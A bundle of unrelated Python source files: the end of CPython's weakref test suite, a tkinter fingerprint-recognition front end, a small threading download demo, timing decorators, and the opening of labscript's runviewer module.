self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
app_gui.py
|
#
# 支持 CLI 和 GUI 执行方式
# 可通过输入 -h 参数查看帮助
# Author: Xiaohei
# Updatetime: 2021-12-01
#
import argparse
from pathlib import Path
import sys
import subprocess
import shlex
import threading
import tkinter as tk
from tkinter import messagebox as mb
from tkinter import filedialog as fd
from tkinter import simpledialog as sd
from tkinter import ttk
from myapp import *
DEFAULT_DATA_PATH = "./data/"
CONFIG_UNSET = "Not set"
# Indexed on feature name, tuple contains the C file, the H file and the Cmake project name for the feature
GUI_TEXT = 0
C_FILE = 1
H_FILE = 2
LIB_NAME = 3
DEFINES = 0
INITIALISERS = 1
class Parameters:
def __init__(self, _img, _data, gui):
self.imgPath = _img
self.dataPath = _data
self.wantGUI = gui
def GetBackground():
return "white"
def GetButtonBackground():
return "white"
def GetTextColour():
return "black"
def GetButtonTextColour():
return "#c51a4a"
def RunGUI(_args):
root = tk.Tk()
style = ttk.Style(root)
style.theme_use("default")
ttk.Style().configure(
"TButton",
padding=6,
relief="groove",
border=2,
foreground=GetButtonTextColour(),
background=GetButtonBackground(),
)
ttk.Style().configure(
"TLabel", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TCheckbutton", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TRadiobutton", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TLabelframe", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TLabelframe.Label", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TCombobox", foreground=GetTextColour(), background=GetBackground()
)
ttk.Style().configure(
"TListbox", foreground=GetTextColour(), background=GetBackground()
)
app = ProjectWindow(root, _args)
app.configure(background=GetBackground())
root.mainloop()
sys.exit(0)
def RunWarning(message):
mb.showwarning("Fingerprint Recognization", message)
sys.exit(0)
def ShowResult(message):
mb.showinfo("Fingerprint Recognization", message)
class ChecklistBox(tk.Frame):
def __init__(self, parent, entries):
tk.Frame.__init__(self, parent)
self.vars = []
for c in entries:
# This var will be automatically updated by the checkbox
# The checkbox fills the var with the "onvalue" and "offvalue" as
# it is clicked on and off
var = tk.StringVar(value="") # Off by default for the moment
self.vars.append(var)
cb = ttk.Checkbutton(
self, var=var, text=c, onvalue=c, offvalue="", width=20
)
cb.pack(side="top", fill="x", anchor="w")
def getCheckedItems(self):
values = []
for var in self.vars:
value = var.get()
if value:
values.append(value)
return values
def thread_function(text, command, ok):
l = shlex.split(command)
proc = subprocess.Popen(l, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
for line in iter(proc.stdout.readline, ""):
if not line:
if ok:
ok["state"] = tk.NORMAL
return
text.insert(tk.END, line)
text.see(tk.END)
# Function to run an OS command and display the output in a new modal window
class DisplayWindow(tk.Toplevel):
def __init__(self, parent, title):
tk.Toplevel.__init__(self, parent)
self.parent = parent
self.text = None
self.OKButton = None
self.init_window(title)
def init_window(self, title):
self.title(title)
frame = tk.Frame(self, borderwidth=5, relief=tk.RIDGE)
frame.pack(fill=tk.X, expand=True, side=tk.TOP)
scrollbar = tk.Scrollbar(frame)
self.text = tk.Text(frame, bg="gray14", fg="gray99")
scrollbar.pack(side=tk.RIGHT, fill=tk.Y)
self.text.pack(side=tk.LEFT, fill=tk.Y)
scrollbar.config(command=self.text.yview)
self.text.config(yscrollcommand=scrollbar.set)
frame1 = tk.Frame(self, borderwidth=1)
frame1.pack(fill=tk.X, expand=True, side=tk.BOTTOM)
self.OKButton = ttk.Button(frame1, text="OK", command=self.OK)
self.OKButton["state"] = tk.DISABLED
self.OKButton.pack()
# make dialog modal
self.transient(self.parent)
self.grab_set()
def OK(self):
self.destroy()
def RunCommandInWindow(parent, command):
w = DisplayWindow(parent, command)
x = threading.Thread(target=thread_function, args=(w.text, command, w.OKButton))
x.start()
parent.wait_window(w)
class EditBoolWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
sd.Dialog.__init__(self, parent, "Edit boolean configuration")
def body(self, master):
self.configure(background=GetBackground())
ttk.Label(self, text=self.config_item["name"]).pack()
self.result = tk.StringVar()
self.result.set(self.current)
ttk.Radiobutton(master, text="True", variable=self.result, value="True").pack(
anchor=tk.W
)
ttk.Radiobutton(master, text="False", variable=self.result, value="False").pack(
anchor=tk.W
)
ttk.Radiobutton(
master, text=CONFIG_UNSET, variable=self.result, value=CONFIG_UNSET
).pack(anchor=tk.W)
def get(self):
return self.result.get()
class EditIntWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
self.input = None
sd.Dialog.__init__(self, parent, "Edit integer configuration")
def body(self, master):
self.configure(background=GetBackground())
_str = (
self.config_item["name"]
+ " Max = "
+ self.config_item["max"]
+ " Min = "
+ self.config_item["min"]
)
ttk.Label(self, text=_str).pack()
self.input = tk.Entry(self)
self.input.pack(pady=4)
self.input.insert(0, self.current)
ttk.Button(self, text=CONFIG_UNSET, command=self.unset).pack(pady=5)
def validate(self):
self.result = self.input.get()
# Check for numeric entry
return True
def unset(self):
self.result = CONFIG_UNSET
self.destroy()
def get(self):
return self.result
class EditEnumWindow(sd.Dialog):
def __init__(self, parent, configitem, current):
self.parent = parent
self.config_item = configitem
self.current = current
self.input = None
sd.Dialog.__init__(self, parent, "Edit Enumeration configuration")
def body(self, master):
# self.configure(background=GetBackground())
values = self.config_item["enumvalues"].split("|")
values.insert(0, "Not set")
self.input = ttk.Combobox(self, values=values, state="readonly")
self.input.set(self.current)
self.input.pack(pady=12)
def validate(self):
self.result = self.input.get()
return True
def get(self):
return self.result
def _get_filepath(filename):
return os.path.join(os.path.dirname(__file__), filename)
# Our main window
class ProjectWindow(tk.Frame):
def __init__(self, parent, _args):
tk.Frame.__init__(self, parent)
self.master = parent
self.help = None
self.logo = None
self.imgPath = None
self.dataPath = None
self.init_window()
def init_window(self):
self.master.title("Fingerprint Recognization")
self.master.configure(bg=GetBackground())
mainFrame = tk.Frame(self, bg=GetBackground()).grid(
row=0, column=0, columnspan=6, rowspan=12
)
# Need to keep a reference to the image or it will not appear.
self.logo = tk.PhotoImage(file=_get_filepath("logo.png"))
logowidget = ttk.Label(
mainFrame, image=self.logo, borderwidth=0, relief="solid"
).grid(row=0, column=0, columnspan=5, pady=10)
# Set image path
imglbl = ttk.Label(mainFrame, text="Image path:").grid(
row=2, column=0, sticky=tk.E
)
self.imgPath = tk.StringVar()
self.imgPath.set(os.getcwd())
imgEntry = ttk.Entry(mainFrame, textvariable=self.imgPath).grid(
row=2, column=1, columnspan=3, sticky=tk.W + tk.E, padx=5
)
imgBrowse = ttk.Button(
mainFrame, text="Browse", command=self.browseImgPath
).grid(row=2, column=4)
# Set data path
datalbl = ttk.Label(mainFrame, text="Data path:").grid(
row=3, column=0, sticky=tk.E
)
self.dataPath = tk.StringVar()
self.dataPath.set(os.getcwd())
dataEntry = ttk.Entry(mainFrame, textvariable=self.dataPath).grid(
row=3, column=1, columnspan=3, sticky=tk.W + tk.E, padx=5
)
dataBrowse = ttk.Button(
mainFrame, text="Browse", command=self.browseDataPath
).grid(row=3, column=4)
# OK, Cancel, Help section
# creating buttons
QuitButton = ttk.Button(mainFrame, text="Quit", command=self.quit).grid(
row=5, column=4
)
OKButton = ttk.Button(mainFrame, text="OK", command=self.OK).grid(
row=5, column=3
)
# TODO help not implemented yet
# HelpButton = ttk.Button(mainFrame, text="Help", command=self.help).grid(row=5, column=0, pady=5)
# You can set a default path here, replace the string with whereever you want.
self.imgPath.set("./image/101_1.tif")
self.dataPath.set("./data/")
def quit(self):
# TODO Check if we want to exit here
sys.exit(0)
def OK(self):
# OK, grab all the settings from the page, then call the generators
_imgPath = self.imgPath.get()
_dataPath = self.dataPath.get()
p = Parameters(_img=Path(_imgPath), _data=Path(_dataPath), gui=True)
DoEverything(self, p)
def browseImgPath(self):
name = fd.askopenfilename(
initialdir="./image/",
title="Select image file",
filetypes=[
("All files", ".*"),
("TIFF files", ".tiff .tif"),
("Windows bitmaps", ".bmp .dib"),
("JPEG files", ".jpeg .jpg .jpe"),
("JPEG 2000 files", ".jp2"),
("Portable Network Graphics", ".png"),
("WebP", ".webp"),
("Portable image format", ".pbm .pgm .ppm .pxm .pnm"),
("PFM files", ".pfm"),
("Sun rasters", ".sr .ras"),
("OpenEXR Image files", ".exr"),
("Radiance HDR", ".hdr .pic"),
],
)
self.imgPath.set(os.path.relpath(name))
def browseDataPath(self):
name = fd.askdirectory(
initialdir="./data/",
title="Select data folder",
)
self.dataPath.set(os.path.relpath(name))
def help(self):
self.help = None
print("Help TODO")
def CheckImgPath(gui, _img):
_imgPath = os.path.exists(Path(_img))
if _imgPath is None:
m = "Unable to locate the image file."
if gui:
RunWarning(m)
else:
print(m)
elif not os.path.isfile(Path(_img)):
m = "Unable to locate the image file, --image does not point to a file."
if gui:
RunWarning(m)
else:
print(m)
_imgPath = None
return _imgPath
def CheckDataPath(gui, _data):
_dataPath = os.path.exists(Path(_data))
if _dataPath is None:
m = "Unable to locate the data folder."
if gui:
RunWarning(m)
else:
print(m)
elif not os.path.isdir(Path(_data)):
m = "Unable to locate the data folder, --data does not point to a folder."
if gui:
RunWarning(m)
else:
print(m)
_dataPath = None
return _dataPath
def ParseCommandLine():
parser = argparse.ArgumentParser(description="Fingerprint Recognization")
parser.add_argument(
"-d", "--data", help="Select an alternative data folder", default="./data/"
)
parser.add_argument("-i", "--image", help="Select a fingerprint image to recognize")
parser.add_argument(
"-g",
"--gui",
action="store_true",
help="Run a GUI version of the fingerprint recognization",
)
return parser.parse_args()
def LoadDataDir(path):
address_lst = os.listdir(path)
name_lst = list(address_lst)
return name_lst
def DoEverything(parent, params):
if (not os.path.exists(params.dataPath)) and os.path.isdir(params.dataPath):
if params.wantGUI:
mb.showerror(
"Fingerprint Recognization",
"Invalid data path. Select a valid path and try again!",
)
return
else:
print("Invalid data path!\n")
sys.exit(-1)
name_lst = LoadDataDir(params.dataPath)
# print("img: ")
# print(params.imgPath)
# print("data: ")
# print(params.dataPath)
print("name_lst: ")
print(name_lst)
flag, name = run_app(str(params.imgPath), str(params.dataPath))
if flag:
m = "Fingerprint matches: {}".format(name)
if params.wantGUI:
ShowResult(m)
else:
print(m)
elif not name == "None":
m = "Fingerprint does not match. Most likely: {}".format(name)
if params.wantGUI:
ShowResult(m)
else:
print(m)
else:
m = "Empty database."
if params.wantGUI:
ShowResult(m)
else:
print(m)
###################################################################################
# main execution starteth here
args = ParseCommandLine()
# TODO Do both warnings in the same error message so user does have to keep coming back to find still more to do
if args.image is None and not args.gui:
print("No image path specfied.\n")
sys.exit(-1)
if args.gui:
RunGUI(args) # does not return, only exits
img = CheckImgPath(args.gui, args.image)
if img is None:
sys.exit(-1)
imgPath = Path(args.image)
data = CheckDataPath(args.gui, args.data)
if data is None:
if not os.path.isdir(Path(DEFAULT_DATA_PATH)):
os.mkdir(Path(DEFAULT_DATA_PATH))
dataPath = Path(DEFAULT_DATA_PATH)
else:
dataPath = Path(args.data)
p = Parameters(_img=imgPath, _data=dataPath, gui=False)
DoEverything(None, p)
|
multithread2.py
|
'''
使用多线程的情况 - 模拟多个下载任务
'''
from random import randint
from threading import Thread
from time import time, sleep
def download_task(filename):
print('开始下载%s...' % filename)
time_to_download = randint(5, 10)
sleep(time_to_download)
print('%s下载完成!耗费了%d秒' % (filename, time_to_download))
def main():
start = time()
thread1 = Thread(target=download_task, args=('Python从入门到住院.pdf',))
thread1.start()
thread2 = Thread(target=download_task, args=('Peking Hot.avi',))
thread2.start()
thread1.join()
thread2.join()
end = time()
print('总共耗费了%.3f秒' % (end - start))
if __name__ == '__main__':
main()
|
threading_support.py
|
# -*- coding: utf-8 -*-
from threading import Event, Thread
def call_repeatedly(intervalSec, func, *args):
stopped = Event()
def loop():
while not stopped.wait(intervalSec): # the first call is in `interval` secs
func(*args)
Thread(target=loop).start()
return stopped.set
from time import sleep
from timeit import default_timer as timer
def timeDurationNoRet(logger, sleepTime = 1.0):
def decorator(func):
def wrapper(*args, **kwargs):
try:
startTime = timer()
func(*args, **kwargs)
elapsed = timer() - startTime
if float(sleepTime) > (elapsed):
sleep(float(sleepTime) - float(elapsed))
return
except Exception as inst:
# log the exception
err = "There was an exception in {}. msg:{}".format(func.__name__, inst.args)
logger.error(err)
return
return wrapper
return decorator
def timeDuration(logger, sleepTime = 1.0):
def decorator(func):
def wrapper(*args, **kwargs):
try:
startTime = timer()
retValue = func(*args, **kwargs)
elapsed = timer() - startTime
if float(sleepTime) > (elapsed):
sleep(float(sleepTime) - float(elapsed))
return retValue
except Exception as inst:
# log the exception
err = "There was an exception in {}. msg:{}".format(func.__name__, inst.args)
logger.error(err)
return None
return wrapper
return decorator
|
__main__.py
|
#####################################################################
# #
# /main.pyw #
# #
# Copyright 2014, Monash University #
# #
# This file is part of the program runviewer, in the labscript #
# suite (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
import os
import sys
import time
import threading
import logging
import ctypes
import socket
if PY2:
str = unicode
from Queue import Queue
else:
from queue import Queue
import ast
import pprint
import signal
# Quit on ctrl-c
signal.signal(signal.SIGINT, signal.SIG_DFL)
import labscript_utils.excepthook
# Set working directory to runviewer folder, resolving symlinks
runviewer_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(runviewer_dir)
try:
from labscript_utils import check_version
except ImportError:
raise ImportError('Require labscript_utils > 2.1.0')
check_version('labscript_utils', '2.6.1', '3')
check_version('qtutils', '2.0.0', '3.0.0')
check_version('zprocess', '1.1.2', '3')
from labscript_utils.setup_logging import setup_logging
logger = setup_logging('runviewer')
labscript_utils.excepthook.set_logger(logger)
from zprocess import zmq_get, ZMQServer
import zprocess.locking
import labscript_utils.h5_lock
import h5py
zprocess.locking.set_client_process_name('runviewer')
# This must be bumped until after the h5_lock import
# This is because the check imports pyqtgraph, which imports h5py
# h5py must be imported after h5_lock, thus we do the check here
check_version('pyqtgraph', '0.9.10', '1')
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
from qtutils.qt.QtCore import pyqtSignal as Signal
import numpy
from scipy import interpolate
# must be imported after PySide/PyQt4
import pyqtgraph as pg
pg.setConfigOption('background', 'w')
pg.setConfigOption('foreground', 'k')
from qtutils import *
import qtutils.icons
from labscript_utils.connections import ConnectionTable
import labscript_devices
from labscript_utils.labconfig import LabConfig, config_prefix
from runviewer.resample import resample as _resample
def set_win_appusermodel(window_id):
from labscript_utils.winshell import set_appusermodel, appids, app_descriptions
icon_path = os.path.abspath('runviewer.ico')
executable = sys.executable.lower()
if not executable.endswith('w.exe'):
executable = executable.replace('.exe', 'w.exe')
relaunch_command = executable + ' ' + os.path.abspath(__file__.replace('.pyc', '.py'))
relaunch_display_name = app_descriptions['runviewer']
set_appusermodel(window_id, appids['runviewer'], icon_path, relaunch_command, relaunch_display_name)
SHOT_MODEL__COLOUR_INDEX = 0
SHOT_MODEL__SHUTTER_INDEX = 1
SHOT_MODEL__CHECKBOX_INDEX = 2
SHOT_MODEL__PATH_INDEX = 1
CHANNEL_MODEL__CHECKBOX_INDEX = 0
CHANNEL_MODEL__CHANNEL_INDEX = 0
def format_time(input_sec):
# inout is the time in sec
if input_sec >= 1:
return "{:.3g}s".format(input_sec)
elif input_sec >= 1e-3:
return "{:.3g}ms".format(input_sec * 1e3)
elif input_sec >= 1e-6:
return "{:.3g}us".format(input_sec * 1e6)
elif input_sec >= 1e-9:
return "{:.3g}ns".format(input_sec * 1e9)
elif input_sec >= 1e-12:
return "{:.3g}ps".format(input_sec * 1e12)
elif input_sec >= 1e-15:
return "{:.3g}fs".format(input_sec * 1e15)
elif input_sec >= 1e-18:
return "{:.3g}as".format(input_sec * 1e18)
else:
return str(input_sec) + "s"
def int_to_enum(enum_list, value):
"""stupid hack to work around the fact that PySide screws with the type of a variable when it goes into a model. Enums are converted to ints, which then
can't be interpreted by QColor correctly (for example)
unfortunately Qt doesn't provide a python list structure of enums, so you have to build the list yourself.
"""
for item in enum_list:
if item == value:
return item
return value
class ScaleHandler():
def __init__(self, input_times, target_positions, stop_time):
# input_times is a list (may be unsorted) of times which should be scaled evenly with target_length
# an input list of [1,2,4,6] and target_length of 1.0 will result in:
# get_scaled_time(1) -> 1
# get_scaled_time(1.5) -> 1.5
# get_scaled_time(3) -> 2.5
# get_scaled_time(4) -> 3
# get_scaled_time(5) -> 3.5 ...
self.org_stop_time = float(stop_time)
if not all((x >= 0) and (x <= self.org_stop_time) for x in input_times):
raise Exception('shot contains at least one marker before t=0 and/or after the stop time. Non-linear time currently does not support this.')
unscaled_times = sorted(input_times)
scaled_times = sorted(target_positions)
# append values for linear scaling before t=0 and after stop time
unscaled_times = [min(unscaled_times)-1e-9] + unscaled_times + [max(unscaled_times) + 1e-9]
scaled_times = [min(scaled_times)-1e-9] + scaled_times + [max(scaled_times) + 1e-9]
self.get_scaled_time = interpolate.interp1d(unscaled_times, scaled_times, assume_sorted=True, bounds_error=False, fill_value='extrapolate')
self.get_unscaled_time = interpolate.interp1d(scaled_times, unscaled_times, assume_sorted=True, bounds_error=False, fill_value='extrapolate')
self.scaled_stop_time = self.get_scaled_time(self.org_stop_time)
class ColourDelegate(QItemDelegate):
def __init__(self, view, *args, **kwargs):
QItemDelegate.__init__(self, *args, **kwargs)
self._view = view
self._colours = [Qt.black, Qt.red, Qt.green, Qt.blue, Qt.cyan, Qt.magenta, Qt.yellow, Qt.gray, Qt.darkRed, Qt.darkGreen, Qt.darkBlue, Qt.darkCyan, Qt.darkMagenta, Qt.darkYellow, Qt.darkGray, Qt.lightGray]
self._current_colour_index = 0
def get_next_colour(self):
colour = self._colours[self._current_colour_index]
self._current_colour_index += 1
if self._current_colour_index >= len(self._colours):
self._current_colour_index = 0
return colour
def createEditor(self, parent, option, index):
editor = QComboBox(parent)
#colours = QColor.colorNames()
for colour in self._colours:
pixmap = QPixmap(20, 20)
pixmap.fill(colour)
editor.addItem(QIcon(pixmap), '', colour)
editor.activated.connect(lambda index, editor=editor: self._view.commitData(editor))
editor.activated.connect(lambda index, editor=editor: self._view.closeEditor(editor, QAbstractItemDelegate.NoHint))
QTimer.singleShot(10, editor.showPopup)
return editor
def setEditorData(self, editor, index):
value = index.model().data(index, Qt.UserRole)
for i in range(editor.count()):
if editor.itemData(i) == value():
editor.setCurrentIndex(i)
break
def setModelData(self, editor, model, index):
icon = editor.itemIcon(editor.currentIndex())
colour = editor.itemData(editor.currentIndex())
# Note, all data being written to the model must be read out of the editor PRIOR to calling model.setData()
# This is because a call to model.setData() triggers setEditorData(), which messes up subsequent
# calls to the editor to determine the currently selected item/data
model.setData(index, icon, Qt.DecorationRole)
model.setData(index, lambda clist=self._colours, colour=colour: int_to_enum(clist, colour), Qt.UserRole)
def updateEditorGeometry(self, editor, option, index):
editor.setGeometry(option.rect)
class RunviewerMainWindow(QMainWindow):
# A signal for when the window manager has created a new window for this widget:
newWindow = Signal(int)
def event(self, event):
result = QMainWindow.event(self, event)
if event.type() == QEvent.WinIdChange:
self.newWindow.emit(self.effectiveWinId())
return result
class RunViewer(object):
def __init__(self, exp_config):
self.ui = UiLoader().load(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'main.ui'), RunviewerMainWindow())
# setup shot treeview model
self.shot_model = QStandardItemModel()
self.shot_model.setHorizontalHeaderLabels(['colour', 'shutters', 'path'])
self.ui.shot_treeview.setModel(self.shot_model)
